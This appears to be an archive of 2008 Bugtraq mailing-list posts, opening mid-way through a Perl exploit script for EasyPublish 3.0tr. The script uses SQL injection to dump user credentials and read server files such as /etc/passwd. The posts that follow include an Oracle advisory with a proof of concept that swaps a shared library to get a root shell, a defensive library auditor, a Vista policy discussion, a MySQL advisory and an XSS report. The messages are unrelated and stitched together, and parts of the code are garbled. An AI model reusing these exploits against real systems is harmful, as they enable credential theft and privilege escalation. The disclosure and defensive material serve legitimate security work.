* Usage : perl $0 http://Example/

";
}   
   
 

$url = ($ARGV[0]);

if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
sub xpl1()
{
$vul = 
"/staticpages/easypublish/index.php?PageSection=0&table=edp_News&page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*";
$requestpage = $url.$vul;

 
my $req  = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
 
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
 
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(//,$name);
$name = @name[0];
 
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(//,$password);
$password = @password[0];

if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
 
print "\n Username: ".$name."\n\n";
print " Password: " .$password."\n\n";

 
}
 

#XPL2

sub xpl2()
{
print "\n Example For File Address : /home/user/public_html/config.php\n Or 
/etc/passwd";
print "\n Enter File Address :";
$fil3 = ;

$vul = 
"/staticpages/easypublish/index.php?PageSection=0&table=edp_News&page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),3,4,1,5+FROM+edp_puusers/*";
$requestpage = $url.$vul;
 
my $req  = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
 
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();

 
@name = split(/Login:/,$content);
$name = $name[1];
@name = split(/<enduser>/,$name);      # marker injected above as 0x3c656e64757365723e ("<enduser>")
$name = $name[0];


if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
 
open (FILE, ">".source.".txt");
print FILE $name;
close (FILE);
print " File Save In source.txt\n";
print "";
 
}

#XPL2 END
#Starting;
print "

*   EasyPublish 3.0tr Exploit  *

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
***

RE: Windows Vista Power Management & Local Security Policy

2008-07-21 Thread Thor (Hammer of God)
If Jim is going to get Nancy to run a program, and that's "not all that
hard," then why not just have that program do what you want in the first
place rather than worrying about the power switch nonsense?  This is the
one million and fourth time:  "If your 'vulnerability' begins with 'if I
can get the user to run code' then whatever comes after the 'then'
doesn't matter.  Period."

t



> -Original Message-
> From: Abe Getchell [mailto:[EMAIL PROTECTED]
> Sent: Saturday, July 19, 2008 12:33 AM
> To: 'Jim Harrison'; bugtraq@securityfocus.com
> Subject: RE: Windows Vista Power Management & Local Security Policy
> 
> As stated in my original e-mail to the list, I definitely don't think
> that this is a security vulnerability in a traditional sense. I
> completely agree with you. Think about it this way... When you press
> the power button on the machine and it performs a graceful shutdown,
> stuff happens inside of the operating system. That stuff happens at an
> elevated privilege level. If there were some way to hook into the stuff
> that happens, you (as an unauthenticated user), could do bad things
> (besides simply shutting down the system) using that hook simply by
> pressing the power button at the logon screen. For example, if Jim
> wants to know what Nancy is working on, he could write a program which
> e-mails him the contents of her "My Documents" folder that is triggered
> by a hook into that process. All Jim needs to do is get Nancy to run
> that program on her system (not hard) and walk by her office when she's
> not there and hit the power button (also not hard). So what can _I_ do
> with this bug? Not much, I'm not that great of a programmer... but I
> think someone out there could do some nasty stuff.
> 
> --
> Abe Getchell
> [EMAIL PROTECTED]
> https://abegetchell.com/
> 
> 
> > -Original Message-
> > From: Jim Harrison [mailto:[EMAIL PROTECTED]
> > Sent: Saturday, July 19, 2008 1:36 AM
> > To: '[EMAIL PROTECTED]'; bugtraq@securityfocus.com
> > Subject: RE: Windows Vista Power Management & Local Security Policy
> >
> > Abe,
> >
> > Other than a denial-of-service from the console (is the power switch
> > now a security vuln, too?), what can you do with this bug?  It's
> > absolutely, unquestionably a "bug"; the user should see behavior as
> > dictated by logic and described in the documentation, but a "security
> > vulnerability"?
> >
> > I think that's stretching things juust a bit.
> >
> > Jim
> >
> > -Original Message-
> > From: Abe Getchell [mailto:[EMAIL PROTECTED]
> > Sent: Thursday, July 17, 2008 7:39 PM
> > To: bugtraq@securityfocus.com
> > Subject: Windows Vista Power Management & Local Security Policy
> >
> > When the security option "Shutdown: Allow system to be shutdown
> > without having to log on" (in the local security policy) is set to
> > "Disable", and the power management setting "When I press the power
> > button" is set to "Shut Down", it is possible for an unauthenticated
> > user to press the power button at the Windows logon screen and
> > gracefully shut down the system. The explanation of this security
> > option, taken from the local security policy, is as follows:
> >
> > "Shutdown: Allow system to be shut down without having to log on
> >
> > This security setting determines whether a computer can be shut down
> > without having to log on to Windows.
> >
> > When this policy is enabled, the Shut Down command is available on
> > the Windows logon screen.
> >
> > When this policy is disabled, the option to shut down the computer
> > does not appear on the Windows logon screen. In this case, *users must
> > be able to log on to the computer successfully and have the Shut down
> > the system user right before they can perform a system shutdown*.
> >
> > Default on workstations: Enabled.
> > Default on servers: Disabled."
> >
> > Note the text between the asterisks. While this bug isn't necessarily
> > a software flaw allowing for an intrusion into the system in a
> > traditional sense, it does set a bad precedent in that power
> > management has a free pass to bypass local security policy and perform
> > actions expressly against the defined policy. It appears that the only
> > impact the use of this security option actually has is enabling or
> > disabling the display of the "power button" on the Windows logon
> > screen (locally only - this setting has no effect on remote desktop
> > connections - the "power button" is not displayed in either case), not
> > actually preventing anyone from (gracefully) shutting down the system
> > without logging in.
> >
> > I reported this to the MSRC on 6/25/2008 and their stance was that
> > this wasn't a security vulnerability, but was likely a bug, and was
> > passed directly to the product team to investigate through their
> > normal bug triage process. After some back and forth, there was
> > silence, and I

Re: Oracle Database Local Untrusted Library Path Vulnerability

2008-07-21 Thread jmpascual


It was reported to Oracle in 2004 by open3s and affects other libs. The 
workaround is very simple, but it is "under investigation / being fixed in 
main codeline. Scheduled for future cpu".


regards

juan manuel pascual


On Sat, 19 Jul 2008, Joxean Koret wrote:


Oracle Database Local Untrusted Library Path Vulnerability
--

The Oracle July 2008 Critical Patch Update fixes a vulnerability which
allows a user in the OINSTALL/DBA group to escalate privileges to root.

Escalating Privileges from "oracle" to "root"


In Oracle 10g R2 and later (Oracle 11g is also vulnerable) the affected
binary, $ORACLE_HOME/bin/extjob, is SUID root and must be SUID root. In
the following forum from Oracle you will find a note at the bottom of
the page:

(...)
In 10.2.0.2 and higher

rdbms/admin/externaljob.ora file must be owned by root:oraclegroup and
be writable only by the owner i.e. 644 (rw-r--r--)

bin/extjob file must be also owned by root:oraclegroup but must be
setuid i.e. 4750 (-rwsr-x---)

bin/extjobo should have normal 755 (rwxr-xr-x) permissions and be owned
by
oracle:oraclegroup

In 11g and higher

Same as 10.2.0.2 but additionally bin/jssu should exist with root
setuid
permissions i.e. owned by root:oraclegroup with 4750 (-rwsr-x---)

(...)

The "oraclegroup" is commonly "dba" or "oinstall". Regardless of the
group's name, if a user can execute OS commands from the database (after
an attacker gains DBA privileges by abusing an SQL injection
vulnerability, for example) the user is allowed to execute, modify,
delete or create new files under the ORACLE_HOME directory.

The following are the linked libraries of the extjob binary:

$ ldd $ORACLE_HOME/bin/extjob
   linux-gate.so.1 =>  (0xe000)
   libclntsh.so.10.1 => /home/joxean/oracle10g/product/10.2.0/db_2/lib/libclntsh.so.10.1 (0xb669d000)
   libdl.so.2 => /lib/tls/i686/cmov/libdl.so.2 (0xb6681000)
   libm.so.6 => /lib/tls/i686/cmov/libm.so.6 (0xb665f000)
   libpthread.so.0 => /lib/tls/i686/cmov/libpthread.so.0 (0xb664d000)
   libnsl.so.1 => /lib/tls/i686/cmov/libnsl.so.1 (0xb6638000)
   libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb6509000)
   libnnz10.so => /home/joxean/oracle10g/product/10.1.0/db_2/lib/libnnz10.so (0xb635f000)
   libaio.so.1 => /usr/lib/libaio.so.1 (0xb635c000)
   /lib/ld-linux.so.2 (0xb7f95000)

As you can see, 2 Oracle libraries are linked to the extjob binary. A
user in the oracle group can't change the binary "extjob" because it's
owned by root but can change linked libraries to execute arbitrary code
under the privileges of "root". The following is an example of what can
be done:

-- Example with libclntsh.so

$ cat test.c
#include <stdio.h>   /* printf */
#include <stdlib.h>  /* system */

/* constructor: runs when the shared object is loaded by the SUID binary */
void __attribute__ ((constructor)) my_init(void)
{
    printf("[+] It works! Root shell...\n");
    system("/bin/sh");
}

$ cc test.c -fPIC -o test.so -shared
$ mv /home/joxean/oracle10g/product/10.2.0/db_2/lib/libclntsh.so.10.2 /home/joxean/oracle10g/product/10.2.0/db_2/lib/.libclntsh.so.10.2
$ mv test.so /home/joxean/oracle10g/product/10.2.0/db_2/lib/libclntsh.so.10.2
$ $ORACLE_HOME/bin/extjob
[+] It works! Root shell...
sh-3.1#

Notes
-

Despite the privileges needed, the vulnerability can be used in a
multi-stage attack to gain root privileges.

Workaround
--

Remove the SUID root bit from the extjob binary.

Disclaimer
--

The information in this advisory and any of its demonstrations is
provided "as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.

Contact
---

Joxean Koret - joxeankoret[at]yahoo[dot]es

References
--

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=727
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2613

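As an added defender-side check (not part of Joxean Koret's advisory or of Oracle's tooling), the script below runs ldd on a setuid binary such as extjob and flags any dependent library that a non-root user could modify or swap out. The stat_fn parameter is an assumption of this example, present only so the logic can be exercised on constructed permission data.

```python
import os
import re
import stat
import subprocess

# ldd prints "name => /path (0xaddr)", or "/path (0xaddr)" for the loader.
# vDSO entries such as "linux-gate.so.1 => (0xaddr)" carry no path; skip them.
_LDD_LINE = re.compile(r"^\s*(?:\S+\s+=>\s+)?(/\S+)\s+\(0x[0-9a-f]+\)")

def parse_ldd(output):
    """Return the on-disk paths ldd resolved for a binary."""
    matches = (_LDD_LINE.match(line) for line in output.splitlines())
    return [m.group(1) for m in matches if m]

def replaceable_by_nonroot(mode, uid):
    """A file or directory that a non-root user can modify: owned by a
    non-root uid, or carrying the group or world write bit."""
    return uid != 0 or bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def risky_libs(paths, stat_fn=os.stat):
    """Flag libraries that are writable, or that live in a directory a
    non-root user can write to: the mv-based swap in the advisory needs
    write access to the directory, not to the library file itself."""
    findings = []
    for path in paths:
        try:
            lib = stat_fn(path)
            parent = stat_fn(os.path.dirname(path))
        except OSError:
            continue  # dangling entry; nothing to check
        if replaceable_by_nonroot(lib.st_mode, lib.st_uid):
            findings.append((path, "file writable by non-root"))
        elif replaceable_by_nonroot(parent.st_mode, parent.st_uid):
            findings.append((path, "directory writable by non-root"))
    return findings

def audit_suid_binary(binary):
    """Run ldd on a setuid binary and list libraries a non-root user could
    swap; returns [] for binaries that are not setuid (nothing to gain)."""
    if not os.stat(binary).st_mode & stat.S_ISUID:
        return []
    ldd = subprocess.run(["ldd", binary], capture_output=True, text=True, check=True)
    return risky_libs(parse_ldd(ldd.stdout))

if __name__ == "__main__":
    import sys
    for path, reason in audit_suid_binary(sys.argv[1]):  # e.g. $ORACLE_HOME/bin/extjob
        print(f"{path}: {reason}")
```

An ORACLE_HOME owned by the oracle user will show every Oracle library as "file writable by non-root", which is exactly the condition the advisory's workaround (dropping the SUID bit) removes.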



[ MDVSA-2008:149 ] - Updated mysql packages fix vulnerabilities

2008-07-21 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:149
 http://www.mandriva.com/security/
 ___
 
 Package : mysql
 Date: July 19, 2008
 Affected: 2008.1
 ___
 
 Problem Description:
 
 Sergei Golubchik found that MySQL did not properly validate optional
 data or index directory paths given in a CREATE TABLE statement; as
 well it would not, under certain conditions, prevent two databases
 from using the same paths for data or index files.  This could allow
 an authenticated user with appropriate privilege to create tables in
 one database to read and manipulate data in tables later created in
 other databases, regardless of GRANT privileges (CVE-2008-2079).
 
 The updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2079
 ___
 
 Updated Packages:
 
 Mandriva Linux 2008.1:
 Mandriva Linux 2008.1/X86_64:
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  



Easybookmarker 40tr Xss Vulnerability By Khashayar Fereidani

2008-07-21 Thread irancrash


Script : Easybookmarker 40tr

Type : Xss Vulnerability

Method : POST

Alert : High



Discovered by : Khashayar Fereidani a.k.a. Dr.Crash

My Official Website : HTTP://FEREIDANI.IR

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com



Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR



Script Download : 
http://myiosoft.com/download/EasyBookMarker/easybookmarker-40tr.zip


Xss Vulnerability :

Variable : rs
Send Method : POST

Set the rs variable with the POST method in ajaxp_backend.php to: 
alert('xss') to test the vulnerability





http://example/zomplog/ajaxp_backend.php";

method="POST" name="form">









Tnx : God

 HTTP://IRCRASH.COM